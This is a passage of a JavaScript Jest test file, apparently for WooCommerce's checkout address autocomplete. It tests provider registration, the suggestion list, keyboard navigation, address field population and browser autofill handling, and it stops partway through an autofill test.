/**
 * @jest-environment jest-fixed-jsdom
 */

describe( 'Address Autocomplete Provider Registration', () => {
	beforeEach( () => {
		delete global.window.wc;
		// Reset the window object and providers before each test
		Object.assign( global.window, {
			wc_address_autocomplete_params: {
				address_providers: JSON.stringify( [
					{ id: 'test-provider', name: 'Test provider' },
					{ id: 'wc-payments', name: 'WooCommerce Payments' },
					{ id: 'provider-1', name: 'Provider 1' },
					{ id: 'provider-2', name: 'Provider 2' },
				] ),
			},
		} );

		// Reset the module before each test
		jest.resetModules();
		require( '../utils/address-autocomplete-common' );
		require( '../address-autocomplete' );
	} );

	test( 'should successfully register a valid provider', () => {
		const validProvider = {
			id: 'test-provider',
			canSearch: () => {},
			search: () => {},
			select: () => {},
		};

		const result =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				validProvider
			);
		expect( result ).toBe( true );
		expect( console ).not.toHaveErrored();
	} );

	test( 'should reject invalid provider (null, undefined, non-object)', () => {
		const invalidProviders = [ null, undefined, 'string', 123, true ];

		invalidProviders.forEach( ( provider ) => {
			const result =
				window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
					provider
				);
			expect( result ).toBe( false );
			expect( console ).toHaveErroredWith(
				'Error registering address provider:',
				'Address provider must be a valid object'
			);
			expect( console ).toHaveErrored();
		} );
	} );

	test( 'should handle missing wc_address_autocomplete_params', () => {
		delete global.window.wc; // ensure fresh load
		global.window.wc_address_autocomplete_params = undefined;
		jest.resetModules();
		require( '../utils/address-autocomplete-common' );
		require( '../address-autocomplete' );
		const validProvider = {
			id: 'test-provider',
			canSearch: () => {},
			search: () => {},
			select: () => {},
		};

		const result =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				validProvider
			);
		expect( result ).toBe( false );
		expect( console ).toHaveErroredWith(
			'Error registering address provider:',
			'Provider test-provider not registered on server'
		);
	} );

	test( 'should handle invalid address_providers type', () => {
		delete global.window.wc; // ensure fresh load
		global.window.wc_address_autocomplete_params = undefined;
		jest.resetModules();
		require( '../utils/address-autocomplete-common' );
		require( '../address-autocomplete' );
		const validProvider = {
			id: 'test-provider',
			canSearch: () => {},
			search: () => {},
			select: () => {},
		};

		const result =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				validProvider
			);
		expect( result ).toBe( false );
		expect( console ).toHaveErroredWith(
			'Error registering address provider:',
			'Provider test-provider not registered on server'
		);
	} );

	test( 'should reject provider without ID', () => {
		const invalidProvider = {
			canSearch: () => {},
			search: () => {},
			select: () => {},
		};

		const result =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				invalidProvider
			);
		expect( result ).toBe( false );
		expect( console ).toHaveErroredWith(
			'Error registering address provider:',
			'Address provider must have a valid ID'
		);
	} );

	test( 'should reject provider with non-string ID', () => {
		const invalidProvider = {
			id: 123,
			canSearch: () => {},
			search: () => {},
			select: () => {},
		};

		const result =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				invalidProvider
			);
		expect( result ).toBe( false );
		expect( console ).toHaveErroredWith(
			'Error registering address provider:',
			'Address provider must have a valid ID'
		);
	} );

	test( 'should reject provider without canSearch function', () => {
		const invalidProvider = {
			id: 'test-provider',
			search: () => {},
			select: () => {},
		};

		const result =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				invalidProvider
			);
		expect( result ).toBe( false );
		expect( console ).toHaveErroredWith(
			'Error registering address provider:',
			'Address provider must have a canSearch function'
		);
	} );

	test( 'should reject provider without search function', () => {
		const invalidProvider = {
			id: 'test-provider',
			canSearch: () => {},
			select: () => {},
		};

		const result =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				invalidProvider
			);
		expect( result ).toBe( false );
		expect( console ).toHaveErroredWith(
			'Error registering address provider:',
			'Address provider must have a search function'
		);
	} );

	test( 'should reject provider without select function', () => {
		const invalidProvider = {
			id: 'test-provider',
			canSearch: () => {},
			search: () => {},
		};

		const result =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				invalidProvider
			);
		expect( result ).toBe( false );
		expect( console ).toHaveErroredWith(
			'Error registering address provider:',
			'Address provider must have a select function'
		);
	} );

	test( 'should reject provider not registered on server', () => {
		const unregisteredProvider = {
			id: 'unregistered-provider',
			canSearch: () => {},
			search: () => {},
			select: () => {},
		};

		const result =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				unregisteredProvider
			);
		expect( result ).toBe( false );
		expect( console ).toHaveErroredWith(
			'Error registering address provider:',
			'Provider unregistered-provider not registered on server'
		);
	} );

	test( 'should freeze provider after successful registration', () => {
		const validProvider = {
			id: 'test-provider',
			canSearch: () => {},
			search: () => {},
			select: () => {},
		};

		const result =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				validProvider
			);
		expect( result ).toBe( true );

		// Verify provider is frozen
		expect(
			Object.isFrozen(
				window.wc.addressAutocomplete.providers[ 'test-provider' ]
			)
		).toBe( true );

		// Attempt to modify should throw in strict mode
		expect( () => {
			window.wc.addressAutocomplete.providers[ 'test-provider' ].newProp =
				'test';
		} ).toThrow( TypeError );

		// Verify the property wasn't added
		expect(
			window.wc.addressAutocomplete.providers[ 'test-provider' ].newProp
		).toBeUndefined();
	} );

	test( 'should not allow duplicate provider registration', () => {
		const provider1 = {
			id: 'test-provider',
			canSearch: () => false,
			search: () => [ 'original' ],
			select: () => {},
		};

		const provider2 = {
			id: 'test-provider',
			canSearch: () => true,
			search: () => [ 'duplicate' ],
			select: () => {},
		};

		// Mock console.warn to capture warning message
		const consoleSpy = jest
			.spyOn( console, 'warn' )
			.mockImplementation( () => {} );

		// Register first provider
		const firstResult =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				provider1
			);
		expect( firstResult ).toBe( true );

		// Try to register second provider with same ID
		const duplicateResult =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				provider2
			);
		expect( duplicateResult ).toBe( false );

		// Verify warning was logged
		expect( consoleSpy ).toHaveBeenCalledWith(
			'Address provider with ID "test-provider" is already registered.'
		);

		// Verify the original provider is preserved (not overwritten)
		expect(
			window.wc.addressAutocomplete.providers[
				'test-provider'
			].canSearch()
		).toBe( false );
		expect(
			window.wc.addressAutocomplete.providers[ 'test-provider' ].search()
		).toEqual( [ 'original' ] );

		consoleSpy.mockRestore();
	} );

	test( 'should allow multiple providers with different IDs', () => {
		const provider1 = {
			id: 'provider-1',
			canSearch: () => true,
			search: () => [ 'provider1-results' ],
			select: () => {},
		};

		const provider2 = {
			id: 'provider-2',
			canSearch: () => true,
			search: () => [ 'provider2-results' ],
			select: () => {},
		};

		// Register both providers
		const result1 =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				provider1
			);
		const result2 =
			window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
				provider2
			);

		expect( result1 ).toBe( true );
		expect( result2 ).toBe( true );

		// Verify both providers are registered
		expect(
			window.wc.addressAutocomplete.providers[ 'provider-1' ]
		).toBeDefined();
		expect(
			window.wc.addressAutocomplete.providers[ 'provider-2' ]
		).toBeDefined();

		// Verify they maintain their separate functionality
		expect(
			window.wc.addressAutocomplete.providers[ 'provider-1' ].search()
		).toEqual( [ 'provider1-results' ] );
		expect(
			window.wc.addressAutocomplete.providers[ 'provider-2' ].search()
		).toEqual( [ 'provider2-results' ] );
	} );
} );

describe( 'Address Suggestions Component', () => {
	let mockProvider;
	let billingAddressInput;
	let shippingAddressInput;

	beforeEach( async () => {
		// Reset DOM
		document.body.innerHTML = '';
		delete global.window.wc;

		// Mock jQuery
		global.window.jQuery = jest.fn( ( selector ) => ( {
			hasClass: jest.fn( () => false ),
			trigger: jest.fn(),
			select2: jest.fn(),
			on: jest.fn(),
		} ) );

		// Setup window object
		Object.assign( global.window, {
			DOMPurify: {
				sanitize: ( input ) => input, // No-op for testing
			},
			wc_address_autocomplete_common_params: {
				address_providers: JSON.stringify( [
					{
						id: 'test-provider',
						name: 'Test provider',
						branding_html:
							'<div class="provider-branding">Powered by Test Provider</div>',
					},
					{
						id: 'test-provider-unbranded',
						name: 'Test provider unbranded',
					},
				] ),
			},
		} );

		// Create DOM structure
		const form = document.createElement( 'form' );

		// Billing fields
		const billingCountry = document.createElement( 'select' );
		billingCountry.id = 'billing_country';
		const billingOption = document.createElement( 'option' );
		billingOption.value = 'US';
		billingOption.selected = true;
		billingCountry.appendChild( billingOption );
		billingCountry.value = 'US';

		const billingAddress1 = document.createElement( 'input' );
		billingAddress1.id = 'billing_address_1';
		billingAddress1.type = 'text';

		const billingCity = document.createElement( 'input' );
		billingCity.id = 'billing_city';
		billingCity.type = 'text';

		const billingPostcode = document.createElement( 'input' );
		billingPostcode.id = 'billing_postcode';
		billingPostcode.type = 'text';

		const billingState = document.createElement( 'input' );
		billingState.id = 'billing_state';
		billingState.type = 'text';

		// Create wrapper for billing address
		const billingWrapper = document.createElement( 'div' );
		billingWrapper.className = 'woocommerce-input-wrapper';
		billingWrapper.appendChild( billingAddress1 );

		// Shipping fields
		const shippingCountry = document.createElement( 'select' );
		shippingCountry.id = 'shipping_country';
		const shippingOption = document.createElement( 'option' );
		shippingOption.value = 'US';
		shippingOption.selected = true;
		shippingCountry.appendChild( shippingOption );
		shippingCountry.value = 'US';

		const shippingAddress1 = document.createElement( 'input' );
		shippingAddress1.id = 'shipping_address_1';
		shippingAddress1.type = 'text';

		const shippingCity = document.createElement( 'input' );
		shippingCity.id = 'shipping_city';
		shippingCity.type = 'text';

		const shippingPostcode = document.createElement( 'input' );
		shippingPostcode.id = 'shipping_postcode';
		shippingPostcode.type = 'text';

		const shippingState = document.createElement( 'input' );
		shippingState.id = 'shipping_state';
		shippingState.type = 'text';

		// Create wrapper for shipping address
		const shippingWrapper = document.createElement( 'div' );
		shippingWrapper.className = 'woocommerce-input-wrapper';
		shippingWrapper.appendChild( shippingAddress1 );

		form.appendChild( billingCountry );
		form.appendChild( billingWrapper );
		form.appendChild( billingCity );
		form.appendChild( billingPostcode );
		form.appendChild( billingState );
		form.appendChild( shippingCountry );
		form.appendChild( shippingWrapper );
		form.appendChild( shippingCity );
		form.appendChild( shippingPostcode );
		form.appendChild( shippingState );

		document.body.appendChild( form );

		billingAddressInput = billingAddress1;
		shippingAddressInput = shippingAddress1;

		// Create mock provider
		mockProvider = {
			id: 'test-provider',
			canSearch: jest.fn( ( country ) => country === 'US' ),
			search: jest.fn( async ( query, country, type ) => [
				{
					id: 'addr1',
					label: '123 Main Street, City, US',
					matchedSubstrings: [ { offset: 0, length: 3 } ],
				},
				{
					id: 'addr2',
					label: '456 Oak Avenue, Town, US',
					matchedSubstrings: [ { offset: 0, length: 3 } ],
				},
			] ),
			select: jest.fn( async ( addressId ) => ( {
				address_1: '123 Main Street',
				city: 'City',
				postcode: '12345',
				country: 'US',
				state: 'CA',
			} ) ),
		};

		// Reset modules and require fresh instance
		jest.resetModules();
		require( '../utils/address-autocomplete-common' );
		require( '../address-autocomplete' );

		// Register the mock provider
		window.wc.addressAutocomplete.registerAddressAutocompleteProvider(
			mockProvider
		);

		// Trigger DOMContentLoaded event and wait for initialization
		const event = new Event( 'DOMContentLoaded' );
		document.dispatchEvent( event );

		// Wait a bit for DOM initialization to complete
		await new Promise( ( resolve ) => setTimeout( resolve, 10 ) );
	} );

	afterEach( () => {
		jest.clearAllMocks();
		// Reset providers properly
		if ( window.wc && window.wc.addressAutocomplete ) {
			window.wc.addressAutocomplete.providers = {};
			window.wc.addressAutocomplete.activeProvider = {
				billing: null,
				shipping: null,
			};
		}
	} );

	describe( 'DOM Initialization', () => {
		test( 'should create suggestions container for address inputs', () => {
			const billingSuggestions = document.getElementById(
				'address_suggestions_billing'
			);
			const shippingSuggestions = document.getElementById(
				'address_suggestions_shipping'
			);

			expect( billingSuggestions ).toBeTruthy();
			expect( shippingSuggestions ).toBeTruthy();

			expect( billingSuggestions.className ).toBe(
				'woocommerce-address-suggestions'
			);
			expect( billingSuggestions.style.display ).toBe( 'none' );
			expect( billingSuggestions.getAttribute( 'role' ) ).toBe(
				'region'
			);
			expect( billingSuggestions.getAttribute( 'aria-live' ) ).toBe(
				'polite'
			);

			// Check suggestions list
			const billingList =
				billingSuggestions.querySelector( '.suggestions-list' );
			expect( billingList ).toBeTruthy();
			expect( billingList.getAttribute( 'role' ) ).toBe( 'listbox' );
			expect( billingList.getAttribute( 'aria-label' ) ).toBe(
				'Address suggestions'
			);

			// Check search icon container exists
			const billingIconContainer = document.querySelector(
				'.address-search-icon'
			);
			expect( billingIconContainer ).toBeTruthy();
		} );

		test( 'should set active provider based on country value', () => {
			expect( window.wc.addressAutocomplete.activeProvider.billing ).toBe(
				mockProvider
			);
			expect(
				window.wc.addressAutocomplete.activeProvider.shipping
			).toBe( mockProvider );
		} );

		test( 'should add autocomplete-available class when provider is active', () => {
			const billingWrapper = billingAddressInput.closest(
				'.woocommerce-input-wrapper'
			);
			const shippingWrapper = shippingAddressInput.closest(
				'.woocommerce-input-wrapper'
			);

			expect(
				billingWrapper.classList.contains( 'autocomplete-available' )
			).toBe( true );
			expect(
				shippingWrapper.classList.contains( 'autocomplete-available' )
			).toBe( true );
		} );
	} );

	describe( 'Active Provider Management', () => {
		test( 'should set active provider when country matches canSearch criteria', () => {
			const billingCountry = document.getElementById( 'billing_country' );
			billingCountry.value = 'US';
			billingCountry.dispatchEvent( new Event( 'change' ) );

			expect( mockProvider.canSearch ).toHaveBeenCalledWith( 'US' );
			expect( window.wc.addressAutocomplete.activeProvider.billing ).toBe(
				mockProvider
			);
		} );

		test( 'should clear active provider when country does not match canSearch criteria', () => {
			const billingCountry = document.getElementById( 'billing_country' );
			// Create new option and select it
			const frOption = document.createElement( 'option' );
			frOption.value = 'FR';
			billingCountry.appendChild( frOption );
			billingCountry.value = 'FR';
			billingCountry.dispatchEvent( new Event( 'change' ) );

			expect( mockProvider.canSearch ).toHaveBeenCalledWith( 'FR' );
			expect( window.wc.addressAutocomplete.activeProvider.billing ).toBe(
				null
			);
		} );

		test( 'should remove autocomplete-available class when no provider is active', () => {
			const billingCountry = document.getElementById( 'billing_country' );
			const billingWrapper = billingAddressInput.closest(
				'.woocommerce-input-wrapper'
			);

			billingCountry.value = 'FR';
			billingCountry.dispatchEvent( new Event( 'change' ) );

			expect(
				billingWrapper.classList.contains( 'autocomplete-available' )
			).toBe( false );
		} );

		test( 'should handle country change for both billing and shipping', () => {
			const billingCountry = document.getElementById( 'billing_country' );
			const shippingCountry =
				document.getElementById( 'shipping_country' );

			// Add FR option to billing
			const frOption = document.createElement( 'option' );
			frOption.value = 'FR';
			billingCountry.appendChild( frOption );
			billingCountry.value = 'FR';

			billingCountry.dispatchEvent( new Event( 'change' ) );
			shippingCountry.dispatchEvent( new Event( 'change' ) );

			expect( window.wc.addressAutocomplete.activeProvider.billing ).toBe(
				null
			);
			expect(
				window.wc.addressAutocomplete.activeProvider.shipping
			).toBe( mockProvider );
		} );
	} );

	describe( 'Address Suggestions Display', () => {
		test( 'should not display suggestions for input less than 3 characters', async () => {
			billingAddressInput.value = 'ab';
			billingAddressInput.dispatchEvent( new Event( 'input' ) );

			// Wait for timeout
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsList = document.querySelector(
				'#address_suggestions_billing .suggestions-list'
			);
			expect( suggestionsList.innerHTML ).toBe( '' );
			expect( mockProvider.search ).not.toHaveBeenCalled();
		} );

		test( 'should hide suggestions when input goes from 3+ characters to less than 3', async () => {
			// First show suggestions with 3+ characters
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'block' );

			// Now reduce to less than 3 characters
			billingAddressInput.value = '12';
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			expect( suggestionsContainer.style.display ).toBe( 'none' );
		} );

		test( 'should display suggestions for input with 3 or more characters', async () => {
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );

			// Wait for timeout and async operations
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			expect( mockProvider.search ).toHaveBeenCalledWith(
				'123',
				'US',
				'billing'
			);

			const suggestionsList = document.querySelector(
				'#address_suggestions_billing .suggestions-list'
			);
			const suggestions = suggestionsList.querySelectorAll( 'li' );

			expect( suggestions ).toHaveLength( 2 );
			expect( suggestions[ 0 ].textContent ).toContain(
				'123 Main Street'
			);
			expect( suggestions[ 1 ].textContent ).toContain(
				'456 Oak Avenue'
			);
		} );

		test( 'should highlight matched text in suggestions', async () => {
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );

			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsList = document.querySelector(
				'#address_suggestions_billing .suggestions-list'
			);
			const firstSuggestion = suggestionsList.querySelector( 'li' );
			const strongElement = firstSuggestion.querySelector( 'strong' );

			expect( strongElement ).toBeTruthy();
			expect( strongElement.textContent ).toBe( '123' );
		} );

		test( 'should limit suggestions to maximum of 5', async () => {
			// Mock provider to return more than 5 suggestions
			mockProvider.search.mockResolvedValue(
				Array.from( { length: 10 }, ( _, i ) => ( {
					id: `addr${ i }`,
					label: `${ i } Test Street`,
					matchedSubstrings: [],
				} ) )
			);

			billingAddressInput.value = 'test';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );

			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsList = document.querySelector(
				'#address_suggestions_billing .suggestions-list'
			);
			const suggestions = suggestionsList.querySelectorAll( 'li' );

			expect( suggestions ).toHaveLength( 5 );
		} );

		test( 'should hide suggestions when no results returned', async () => {
			mockProvider.search.mockResolvedValue( [] );

			billingAddressInput.value = 'xyz';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );

			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'none' );
		} );

		test( 'should hide suggestions and log error when search throws exception', async () => {
			mockProvider.search.mockRejectedValue(
				new Error( 'Search failed' )
			);

			const consoleSpy = jest
				.spyOn( console, 'error' )
				.mockImplementation( () => {} );

			billingAddressInput.value = 'test';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );

			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'none' );
			expect( consoleSpy ).toHaveBeenCalledWith(
				'Address search error:',
				expect.any( Error )
			);

			consoleSpy.mockRestore();
		} );
	} );

	describe( 'Keyboard Navigation', () => {
		beforeEach( async () => {
			// Setup suggestions
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );
		} );

		test( 'should navigate down with ArrowDown key', () => {
			const suggestions = document.querySelectorAll(
				'#address_suggestions_billing .suggestions-list li'
			);

			// No suggestion should be active initially
			expect( suggestions[ 0 ].classList.contains( 'active' ) ).toBe(
				false
			);
			expect( suggestions[ 0 ].getAttribute( 'aria-selected' ) ).toBe(
				null
			);

			// Press ArrowDown
			const keydownEvent = new KeyboardEvent( 'keydown', {
				key: 'ArrowDown',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( keydownEvent );

			// First suggestion should now be active
			expect( suggestions[ 0 ].classList.contains( 'active' ) ).toBe(
				true
			);
			expect( suggestions[ 0 ].getAttribute( 'aria-selected' ) ).toBe(
				'true'
			);
			expect( suggestions[ 1 ].classList.contains( 'active' ) ).toBe(
				false
			);
		} );

		test( 'should navigate up with ArrowUp key', () => {
			const suggestions = document.querySelectorAll(
				'#address_suggestions_billing .suggestions-list li'
			);

			// Navigate to first item first
			let keydownEvent = new KeyboardEvent( 'keydown', {
				key: 'ArrowDown',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( keydownEvent );

			// Navigate to second item
			keydownEvent = new KeyboardEvent( 'keydown', {
				key: 'ArrowDown',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( keydownEvent );

			// Press ArrowUp
			keydownEvent = new KeyboardEvent( 'keydown', {
				key: 'ArrowUp',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( keydownEvent );

			// First suggestion should be active again
			expect( suggestions[ 0 ].classList.contains( 'active' ) ).toBe(
				true
			);
			expect( suggestions[ 1 ].classList.contains( 'active' ) ).toBe(
				false
			);
		} );

		test( 'should wrap around when navigating beyond bounds', () => {
			const suggestions = document.querySelectorAll(
				'#address_suggestions_billing .suggestions-list li'
			);

			// Navigate to first item
			let keydownEvent = new KeyboardEvent( 'keydown', {
				key: 'ArrowDown',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( keydownEvent );

			// Navigate to second (last) item
			keydownEvent = new KeyboardEvent( 'keydown', {
				key: 'ArrowDown',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( keydownEvent );

			// Navigate beyond last item - should wrap to first
			keydownEvent = new KeyboardEvent( 'keydown', {
				key: 'ArrowDown',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( keydownEvent );

			expect( suggestions[ 0 ].classList.contains( 'active' ) ).toBe(
				true
			);
			expect( suggestions[ 1 ].classList.contains( 'active' ) ).toBe(
				false
			);
		} );

		test( 'should select address with Enter key', async () => {
			// Navigate to first suggestion first
			let keydownEvent = new KeyboardEvent( 'keydown', {
				key: 'ArrowDown',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( keydownEvent );

			// Press Enter to select first suggestion
			keydownEvent = new KeyboardEvent( 'keydown', {
				key: 'Enter',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( keydownEvent );

			// Wait for async operations
			await new Promise( ( resolve ) => setTimeout( resolve, 250 ) );

			expect( mockProvider.select ).toHaveBeenCalledWith( 'addr1' );

			// Suggestions should be hidden
			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'none' );
		} );

		test( 'should hide suggestions with Escape key', () => {
			const suggestionsContainer = document.getElementById(
				'address_suggestions_billing'
			);
			expect( suggestionsContainer.style.display ).toBe( 'block' );

			// Press Escape
			const keydownEvent = new KeyboardEvent( 'keydown', {
				key: 'Escape',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( keydownEvent );

			expect( suggestionsContainer.style.display ).toBe( 'none' );
		} );

		test( 'should not handle keyboard events when suggestions are hidden', () => {
			// Hide suggestions first
			const escapeEvent = new KeyboardEvent( 'keydown', {
				key: 'Escape',
				bubbles: true,
			} );
			billingAddressInput.dispatchEvent( escapeEvent );

			// Try to navigate with ArrowDown - should not throw error
			const arrowEvent = new KeyboardEvent( 'keydown', {
				key: 'ArrowDown',
				bubbles: true,
			} );
			expect( () => {
				billingAddressInput.dispatchEvent( arrowEvent );
			} ).not.toThrow();
		} );
	} );

	describe( 'Address Selection', () => {
		test( 'should populate address fields when address is selected', async () => {
			// Setup suggestions
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			// Click on first suggestion
			const firstSuggestion = document.querySelector(
				'#address_suggestions_billing .suggestions-list li'
			);
			firstSuggestion.click();

			// Wait for async operations and timeout
			await new Promise( ( resolve ) => setTimeout( resolve, 250 ) );

			expect( mockProvider.select ).toHaveBeenCalledWith( 'addr1' );

			// Check that fields are populated
			expect( document.getElementById( 'billing_address_1' ).value ).toBe(
				'123 Main Street'
			);
			expect( document.getElementById( 'billing_city' ).value ).toBe(
				'City'
			);
			expect( document.getElementById( 'billing_postcode' ).value ).toBe(
				'12345'
			);
			expect( document.getElementById( 'billing_country' ).value ).toBe(
				'US'
			);
			expect( document.getElementById( 'billing_state' ).value ).toBe(
				'CA'
			);
		} );

		test( 'should handle partial address data from provider', async () => {
			// Mock provider to return partial data
			mockProvider.select.mockResolvedValue( {
				address_1: '123 Main Street',
				city: 'City',
				// Missing postcode, country, state
			} );

			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const firstSuggestion = document.querySelector(
				'#address_suggestions_billing .suggestions-list li'
			);
			firstSuggestion.click();

			await new Promise( ( resolve ) => setTimeout( resolve, 250 ) );

			// Only provided fields should be populated
			expect( document.getElementById( 'billing_address_1' ).value ).toBe(
				'123 Main Street'
			);
			expect( document.getElementById( 'billing_city' ).value ).toBe(
				'City'
			);
			expect( document.getElementById( 'billing_postcode' ).value ).toBe(
				''
			);
		} );

		test( 'should clear existing field values when not present in selected address data', async () => {
			// Create address_2 field since it's not in the initial setup
			const billingAddress2 = document.createElement( 'input' );
			billingAddress2.id = 'billing_address_2';
			billingAddress2.type = 'text';
			billingAddress2.value = 'Apt 101';
			document.querySelector( 'form' ).appendChild( billingAddress2 );

			// Pre-populate some fields
			document.getElementById( 'billing_city' ).value = 'Old City';
			document.getElementById( 'billing_postcode' ).value = '99999';
			document.getElementById( 'billing_state' ).value = 'TX';

			// Mock provider to return data with some fields missing
			mockProvider.select.mockResolvedValue( {
				address_1: '456 Oak Avenue',
				city: 'New City',
				country: 'US',
				// Missing address_2, postcode, and state
			} );

			billingAddressInput.value = '456';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const firstSuggestion = document.querySelector(
				'#address_suggestions_billing .suggestions-list li'
			);
			firstSuggestion.click();

			await new Promise( ( resolve ) => setTimeout( resolve, 250 ) );

			// Check that provided fields are populated
			expect( document.getElementById( 'billing_address_1' ).value ).toBe(
				'456 Oak Avenue'
			);
			expect( document.getElementById( 'billing_city' ).value ).toBe(
				'New City'
			);
			expect( document.getElementById( 'billing_country' ).value ).toBe(
				'US'
			);

			// Check that missing fields are cleared
			expect( document.getElementById( 'billing_address_2' ).value ).toBe(
				''
			);
			expect( document.getElementById( 'billing_postcode' ).value ).toBe(
				''
			);
			expect( document.getElementById( 'billing_state' ).value ).toBe(
				''
			);
		} );

		test( 'should only clear fields that exist and have values', async () => {
			// Pre-populate only some fields
			document.getElementById( 'billing_city' ).value = 'Existing City';
			document.getElementById( 'billing_postcode' ).value = '12345';

			// Mock provider to return partial data
			mockProvider.select.mockResolvedValue( {
				address_1: '789 Pine Street',
				state: 'CA',
				country: 'US',
				// Missing city and postcode
			} );

			billingAddressInput.value = '789';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const firstSuggestion = document.querySelector(
				'#address_suggestions_billing .suggestions-list li'
			);
			firstSuggestion.click();

			await new Promise( ( resolve ) => setTimeout( resolve, 250 ) );

			// Check that provided fields are populated
			expect( document.getElementById( 'billing_address_1' ).value ).toBe(
				'789 Pine Street'
			);
			expect( document.getElementById( 'billing_state' ).value ).toBe(
				'CA'
			);
			expect( document.getElementById( 'billing_country' ).value ).toBe(
				'US'
			);

			// Check that city and postcode are cleared since they had values but weren't in the response
			expect( document.getElementById( 'billing_city' ).value ).toBe(
				''
			);
			expect( document.getElementById( 'billing_postcode' ).value ).toBe(
				''
			);
		} );

		test( 'should handle provider selection errors gracefully', async () => {
			mockProvider.select.mockRejectedValue(
				new Error( 'Selection failed' )
			);

			const consoleSpy = jest
				.spyOn( console, 'error' )
				.mockImplementation( () => {} );

			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const firstSuggestion = document.querySelector(
				'#address_suggestions_billing .suggestions-list li'
			);
			firstSuggestion.click();

			await new Promise( ( resolve ) => setTimeout( resolve, 250 ) );

			expect( consoleSpy ).toHaveBeenCalledWith(
				'Error selecting address from provider',
				'test-provider',
				expect.any( Error )
			);

			// Fields should remain unchanged
			expect( document.getElementById( 'billing_address_1' ).value ).toBe(
				'123'
			);

			consoleSpy.mockRestore();
		} );

		test( 'should handle invalid address data from provider', async () => {
			mockProvider.select.mockResolvedValue( null );

			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );
			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			const firstSuggestion = document.querySelector(
				'#address_suggestions_billing .suggestions-list li'
			);
			firstSuggestion.click();

			await new Promise( ( resolve ) => setTimeout( resolve, 250 ) );

			// Fields should remain unchanged
			expect( document.getElementById( 'billing_address_1' ).value ).toBe(
				'123'
			);
		} );
	} );

	describe( 'Browser Autofill Management', () => {
		test( 'should disable browser autofill when suggestions are shown', async () => {
			billingAddressInput.value = '123';
			billingAddressInput.focus();
			billingAddressInput.dispatchEvent( new Event( 'input' ) );

			await new Promise( ( resolve ) => setTimeout( resolve, 150 ) );

			expect( billingAddressInput.getAttribute( 'autocomplete' ) ).toBe(
				'none'
			);
			expect( billingAddressInput.getAttribute( 'data-lpignore' ) ).toBe(
				'true'
			);
			expect( billingAddressInput.getAttribute( 'data-op-ignore' ) ).toBe(
				'true'
			);
			expect( billingAddressInput.getAttribute( 'data-1p-ignore' ) ).toBe(
				'true'
			);
		} );

		test( 'should enable browser autofill when suggestions are hidden', async () => {
			// First show suggestions
			billingAddressInput.value = '123';
